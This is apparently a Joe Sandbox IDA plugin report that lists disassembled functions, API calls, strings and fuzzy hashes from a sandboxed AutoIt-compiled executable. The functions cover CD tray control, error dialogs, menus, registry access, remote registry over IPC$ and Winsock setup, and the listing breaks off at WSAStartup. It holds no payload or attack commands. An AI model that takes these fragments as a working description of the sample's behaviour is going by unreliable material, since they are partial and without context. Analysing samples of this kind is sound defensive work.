Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 58c68e2591a0593445843fd82e2eaf4a3c2d403af426f2da6e1ebb6d57268e3e
Instruction ID: ff422199d87a0cab57f08389bf80794eebfd4a63d49e667ff433ec51e4aa4c1d
Opcode Fuzzy Hash: 58c68e2591a0593445843fd82e2eaf4a3c2d403af426f2da6e1ebb6d57268e3e
Instruction Fuzzy Hash: 05516E3194051AAACF14EBE0DD86EEEB7F8EF14300F1400A5B509721A2EF312F59DB64

Function 00B8A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

CharLowerBuffW.USER32(?,?), ref: 00B8A3CB
GetDriveTypeW.KERNEL32 ref: 00B8A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B8A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B8A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B8A4C5

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

Strings

close, xrefs: 00B8A3D1
open, xrefs: 00B8A3F2
set cd door , xrefs: 00B8A466
type cdaudio alias cd wait, xrefs: 00B8A443
close cd wait, xrefs: 00B8A4B0
wait, xrefs: 00B8A482
closed, xrefs: 00B8A3DF, 00B8A3E8
open , xrefs: 00B8A427

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: ed32b09c409f7675fee1c437d7a700f15d6240b263ea35da386e3e13bb4568e6
Instruction ID: 14c173ace1bbd595547313c965434a756fe90ed6b094046a784f3acc4ce4c0f8
Opcode Fuzzy Hash: ed32b09c409f7675fee1c437d7a700f15d6240b263ea35da386e3e13bb4568e6
Instruction Fuzzy Hash: 60518C711043159FC700EF20D89196AB3E4EF94758F1489AEF89A573A1DB31EE0ACB92

Function 00B7F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00B5E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00B7F8DF
LoadStringW.USER32(00000000,?,00B5E029,00000001), ref: 00B7F8E8

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

GetModuleHandleW.KERNEL32(00000000,00BE5310,?,00000FFF,?,?,00B5E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00B7F90A
LoadStringW.USER32(00000000,?,00B5E029,00000001), ref: 00B7F90D
__swprintf.LIBCMT ref: 00B7F95D
__swprintf.LIBCMT ref: 00B7F96E
_wprintf.LIBCMT ref: 00B7FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B7FA2E

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00B7FA12
^ ERROR, xrefs: 00B7F9C3
Line %d (File "%s"):, xrefs: 00B7F957
Line %d:, xrefs: 00B7F968
Error: , xrefs: 00B7F9E5

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 4ea5c054e6c170c08a1da7cb916d00d033bde1e9b6f6c2fa08332067f554ee57
Instruction ID: e679beba0fbc1ce32fd565ffedee39f7c06785a828897c90635170915780e104
Opcode Fuzzy Hash: 4ea5c054e6c170c08a1da7cb916d00d033bde1e9b6f6c2fa08332067f554ee57
Instruction Fuzzy Hash: 35413E7284411AAACF14FBE0DD96DFEB7B8EF18301F1000A5B509760A1EE315F49CA64

Function 00BABA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00BA9207,?,?), ref: 00BABA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00BA9207,?,?,00000000,?), ref: 00BABA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00BA9207,?,?,00000000,?), ref: 00BABA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00BA9207,?,?,00000000,?), ref: 00BABA85
GlobalLock.KERNEL32(00000000), ref: 00BABA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00BA9207,?,?,00000000,?), ref: 00BABA9D
GlobalUnlock.KERNEL32(00000000), ref: 00BABAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00BA9207,?,?,00000000,?), ref: 00BABAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BA9207,?,?,00000000,?), ref: 00BABABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00BB2CAC,?), ref: 00BABAD7
GlobalFree.KERNEL32(00000000), ref: 00BABAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 00BABB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00BABB36
DeleteObject.GDI32(00000000), ref: 00BABB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BABB74

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 1030bbe45df16d6c124ba8c27e6c4685ba496a4933f86541c41482e9f7b5bc81
Instruction ID: 0a97c0f61f4a2488d331f01b12efbd6f9b730c3679afab1868e0a5e8a3a2cf86
Opcode Fuzzy Hash: 1030bbe45df16d6c124ba8c27e6c4685ba496a4933f86541c41482e9f7b5bc81
Instruction Fuzzy Hash: 6B412875600209EFDB219FA5DC89EBABBF9FB8A711F1040A8F915D7261DB309D01CB60

Function 00B8D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00B8DA10
_wcscat.LIBCMT ref: 00B8DA28
_wcscat.LIBCMT ref: 00B8DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B8DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00B8DA63
GetFileAttributesW.KERNEL32(?), ref: 00B8DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00B8DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00B8DAA7

Strings

*.*, xrefs: 00B8DAE6

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 05017c650be9c3224a99bbfcf3650337fe1bee67870a5ab22f237656b6246159
Instruction ID: 620053bed32b554ab3a67558ea6875954ff7d6cf3578b4e4400a09f9afbebcef
Opcode Fuzzy Hash: 05017c650be9c3224a99bbfcf3650337fe1bee67870a5ab22f237656b6246159
Instruction Fuzzy Hash: 5C8173716043419FCB24FF64C885AAAB7E4EF89310F1849AFF889D72A1E630DD45CB52

Function 00BAC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B22612: GetWindowLongW.USER32(?,000000EB), ref: 00B22623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BAC1FC
GetFocus.USER32 ref: 00BAC20C
GetDlgCtrlID.USER32(00000000), ref: 00BAC217
_memset.LIBCMT ref: 00BAC342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BAC36D
GetMenuItemCount.USER32(?), ref: 00BAC38D
GetMenuItemID.USER32(?,00000000), ref: 00BAC3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BAC3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BAC41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BAC454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BAC489

Strings

0, xrefs: 00BAC33A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 62c01e5c2ed56933bdc629529347900995629c1d49ff396fe62a03aa3023681d
Instruction ID: 89f31797037bb1244ba186e22afd506952d46e37a80ed1a901c730bc1fa2a4d6
Opcode Fuzzy Hash: 62c01e5c2ed56933bdc629529347900995629c1d49ff396fe62a03aa3023681d
Instruction Fuzzy Hash: F5819F70608301AFDB20DF54C894ABBBBE4FB8A714F0049ADF99597291DB70DD05CB96

Function 00B9731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00B9738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B9739B
CreateCompatibleDC.GDI32(?), ref: 00B973A7
SelectObject.GDI32(00000000,?), ref: 00B973B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B97408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B97444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B97468
SelectObject.GDI32(00000006,?), ref: 00B97470
DeleteObject.GDI32(?), ref: 00B97479
DeleteDC.GDI32(00000006), ref: 00B97480
ReleaseDC.USER32(00000000,?), ref: 00B9748B

Strings

(, xrefs: 00B97410

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 8af1f857720ce7a0705434d459326c2d7b3515f1b50c9e8386a35994028d7525
Instruction ID: 2da5fd9f6c442ad651f217d0185c4e0e5a39ec15fa2983c3d472f13b7b8407a4
Opcode Fuzzy Hash: 8af1f857720ce7a0705434d459326c2d7b3515f1b50c9e8386a35994028d7525
Instruction Fuzzy Hash: 17514975944209EFCB24CFA8CC85EAEBBF9EF49310F14846DF95997211CB31A941CB60

Function 00B26A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00B40957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00B26B0C,?,00008000), ref: 00B40973

Part of subcall function 00B24750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B24743,?,?,00B237AE,?), ref: 00B24770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B26BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00B26CFA

Part of subcall function 00B2586D: _wcscpy.LIBCMT ref: 00B258A5

Part of subcall function 00B4363D: _iswctype.LIBCMT ref: 00B43645

Strings

Error opening the file, xrefs: 00B5E43D, 00B5E4B8
EA06, xrefs: 00B5E452
AU3!, xrefs: 00B26B61
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00B5E421
Bad directive syntax error, xrefs: 00B5E79D
Unterminated string, xrefs: 00B5E7E4
>>>AUTOIT SCRIPT<<<, xrefs: 00B5E496

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 816c6be6e89067e8583a03709e13f2b50513f9d51d64174c6706c24dd5605f84
Instruction ID: 6aca109da439793a602d1be8d539b949cdf678f0981fe08bc2de40337b1eac93
Opcode Fuzzy Hash: 816c6be6e89067e8583a03709e13f2b50513f9d51d64174c6706c24dd5605f84
Instruction Fuzzy Hash: 7D02BF301083519FC724EF24D881AAFBBE5FF99354F1048ADF899972A1DB30DA49CB52

Function 00B82D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B82D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00B82DDD
GetMenuItemCount.USER32(00BE5890), ref: 00B82E66
DeleteMenu.USER32(00BE5890,00000005,00000000,000000F5,?,?), ref: 00B82EF6
DeleteMenu.USER32(00BE5890,00000004,00000000), ref: 00B82EFE
DeleteMenu.USER32(00BE5890,00000006,00000000), ref: 00B82F06
DeleteMenu.USER32(00BE5890,00000003,00000000), ref: 00B82F0E
GetMenuItemCount.USER32(00BE5890), ref: 00B82F16
SetMenuItemInfoW.USER32(00BE5890,00000004,00000000,00000030), ref: 00B82F4C
GetCursorPos.USER32(?), ref: 00B82F56
SetForegroundWindow.USER32(00000000), ref: 00B82F5F
TrackPopupMenuEx.USER32(00BE5890,00000000,?,00000000,00000000,00000000), ref: 00B82F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00B82F7E

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 27245afd279a88347b1bcc946a561cd37d6159a4b29a721d4858805341a6fa62
Instruction ID: 8042e6a97396540a68abe34e55b860aa3e0ea751735fcaf5a1c23cbe4197e8ec
Opcode Fuzzy Hash: 27245afd279a88347b1bcc946a561cd37d6159a4b29a721d4858805341a6fa62
Instruction Fuzzy Hash: 6471D470600206BBEB21AF54DC85FAABFE4FF05365F1002A6F615AA1F1CBB15C10DB94

Function 00B777DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

_memset.LIBCMT ref: 00B7786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B778A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B778BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B778D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B77902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00B7792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B77935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B7793A

Strings

\IPC$, xrefs: 00B77882
SOFTWARE\Classes\, xrefs: 00B7780C
\CLSID, xrefs: 00B77822

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: bcf10681e3fabb8aeb7eb1afe6b84b25f64e3fb59382aa9215e87253c617ea60
Instruction ID: 292adca577cb0a08c4918a33d48a6bc23baece446f3d5d1c03cd1f755733c3cf
Opcode Fuzzy Hash: bcf10681e3fabb8aeb7eb1afe6b84b25f64e3fb59382aa9215e87253c617ea60
Instruction Fuzzy Hash: 4941FA72C54229ABCF21EFA4EC55DEDB7B8FF04310F4045AAE919A3261EE305D04CB94

Function 00BA0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B9FDAD,?,?), ref: 00BA0E31

Strings

HKCC, xrefs: 00BA0EFF
HKCR, xrefs: 00BA0ED9
HKEY_CLASSES_ROOT, xrefs: 00BA0EC4
HKLM, xrefs: 00BA0EAF
HKCU, xrefs: 00BA0F21
HKEY_CURRENT_USER, xrefs: 00BA0F10
HKU, xrefs: 00BA0F43
HKEY_CURRENT_CONFIG, xrefs: 00BA0EEE
HKEY_LOCAL_MACHINE, xrefs: 00BA0E9A
HKEY_USERS, xrefs: 00BA0F32

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: bdd91575d7ea5f6831b88aa40dab6128e0a144d3ae49b065a936c53e5eb9d7ba
Instruction ID: e90c10c9f5c3ea566fac05bc0fe6cde8d6eb56243bf3d6088e699dd07c4e468b
Opcode Fuzzy Hash: bdd91575d7ea5f6831b88aa40dab6128e0a144d3ae49b065a936c53e5eb9d7ba
Instruction Fuzzy Hash: 86412F3216824A9FCF20FF10D855AEE77E4EF22354F1404E5FC592B292DB31995ADBA0

Function 00B7F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B5E2A0,00000010,?,Bad directive syntax error,00BAF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00B7F7C2
LoadStringW.USER32(00000000,?,00B5E2A0,00000010), ref: 00B7F7C9

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

_wprintf.LIBCMT ref: 00B7F7FC
__swprintf.LIBCMT ref: 00B7F81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B7F88D

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00B7F7F7
Error: , xrefs: 00B7F85B
Line %d (File "%s"):, xrefs: 00B7F833
Line %d:, xrefs: 00B7F818
., xrefs: 00B7F873

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: 55a503ed12211d89ea60ffb7dcd3e55e8e3915d7bc2d2fe6a53381c908e74e25
Instruction ID: 4669abf98651958eec54a3c4c6bd59810d99d480101b38e4efa31f43a50d2100
Opcode Fuzzy Hash: 55a503ed12211d89ea60ffb7dcd3e55e8e3915d7bc2d2fe6a53381c908e74e25
Instruction Fuzzy Hash: C3219E3284021AEBCF11EFA0DC4AEFE77B9FF18301F0444A6F519661A2EA319618DB55

Function 00B852C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00B27BCC: _memmove.LIBCMT ref: 00B27C06

Part of subcall function 00B27924: _memmove.LIBCMT ref: 00B279AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B85330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B85346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B85357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B85369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B8537A

Strings

play PlayMe, xrefs: 00B85375
status PlayMe mode, xrefs: 00B8532B
alias PlayMe, xrefs: 00B85309
close PlayMe, xrefs: 00B85341, 00B8536E
open , xrefs: 00B852DF
play PlayMe wait, xrefs: 00B85364

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: c6b0042b6392413b65ea45d8423cd7e5bf656fe0e1b27464ebb4b5e3d880ea03
Instruction ID: 5079b0c4cc8821c411372e655bcdf61fc94414efe844262b3b3064d65550b384
Opcode Fuzzy Hash: c6b0042b6392413b65ea45d8423cd7e5bf656fe0e1b27464ebb4b5e3d880ea03
Instruction Fuzzy Hash: B011C830A9022979D720B771DC4ADFFBBFCEB92B41F0004AA7405921F1EDA04D44C674

Function 00B846B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00B846D2
